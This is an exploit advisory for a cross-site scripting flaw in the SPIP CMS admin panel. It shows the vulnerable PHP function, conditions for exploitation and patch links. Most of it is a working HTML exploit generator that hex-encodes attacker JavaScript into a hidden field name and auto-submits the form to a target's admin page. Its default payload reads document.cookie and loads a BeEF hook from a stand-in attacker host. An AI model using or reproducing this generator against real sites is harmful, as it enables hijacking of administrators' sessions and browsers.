################################################################### # # Exploit Title: SPIP Core <= 3.0.1, 2.1.14, 2.0.19 XSS admin panel # Google Dork: # Date: 13/06/2012 # Exploit Author: x@s # Vendor Homepage: http://www.spip.net/ # Software Link: http://www.spip.net/ # Version: <= 3.0.1, 2.1.14 or 2.0.19 # Tested on: Firefox 13 # ################################################################### Affected file: -------------- /spip/ecrire/inc/admin.php ################################################################### Vuln function: -------------- function copy_request($script, $suite, $submit='') { include_spip('inc/filtres'); foreach(array_merge($_POST,$_GET) as $n => $c) { if (!in_array($n,array('fichier','exec','validation_admin')) AND !is_array($c)) $suite .= "\n<input type='hidden' name='$n' value='" . entites_html($c) . "' />"; } return generer_form_ecrire($script, $suite, '', $submit); } ################################################################### Details: -------- The variable $n isn't sanitized before being reinjected into the form generated. ################################################################### Needs: ------ Magic_quote_gcp should be disabled. Compatible with Firefox 13 but not Chrome. ################################################################### Exploit generator: ------------------ <html> <head> <script> function trim(s){ return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,''); } function encodeToHex(s){ var r=""; var h; for(var c=0;c<s.length;c++){ h=s.charCodeAt(c).toString(16); while(h.length<3) h="%"+h; r+=h; } return r; } function generateXSS(){ var target = trim(document.getElementById("target").value); var version = trim(document.getElementById("version").value); var content = trim(document.getElementById("content").value); var resultjs = ""; resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>"; resultjs += "<input type='hidden' name='exec' value='" + version + "' />"; resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />"; resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>"; document.getElementById("resultjs").value = resultjs; } </script> </head> <body onload="generateXSS();"> <h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2> <p> This XSS, non-persistent, use POST vars through admin panel.<br /> The target is the attribute "name" of an input markup hidden.<br /> This XSS work on Firefox 13, IE7, but doesn't work on Chrome.<br /> Magic_quote_gcp = Off needed. </p> <form action="" onsubmit="generateXSS();return false;"> <table> <tr> <td>URL's SPIP Targeted :</td> <td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td> </tr> <tr> <td>SPIP version :</td> <td> <select id="version" onchange="generateXSS();"> <option value="base_repair">3.0.X (up to 3.0.1 included)</option> <option value="admin_repair">2.1.X (up to 2.1.14 included)</option> </select> </td> </tr> <tr> <td>JavaScript code to execute :<br />(without <script> & </script> markup)</td> <td> <textarea cols="70" rows="10" id="content" onkeyup="generateXSS();"> alert(document.cookie); var script = document.createElement("script"); script.type = "text/javascript"; script.src = "http://ha.ck.er.xxx/beEf.js"; document.body.appendChild(script); </textarea> </td> </tr> <tr> <td>Exploit to send to an admin : </td> <td> <textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea> </td> </tr> </table> </form> </body> </html> ################################################################### Patch: ------ SPIP 2.0.X (up to 2.0.20) : http://core.spip.org/projects/spip/repository/revisions/19558 SPIP 2.1.X (up to 2.1.15) : http://core.spip.org/projects/spip/repository/revisions/19559 SPIP 3.0.X (up to 3.0.2) : http://core.spip.org/projects/spip/repository/revisions/19560 ################################################################### Credits: -------- ASafety - x@s - http://blog.asafety.fr/vuln-exploit-poc/xss-spip-core/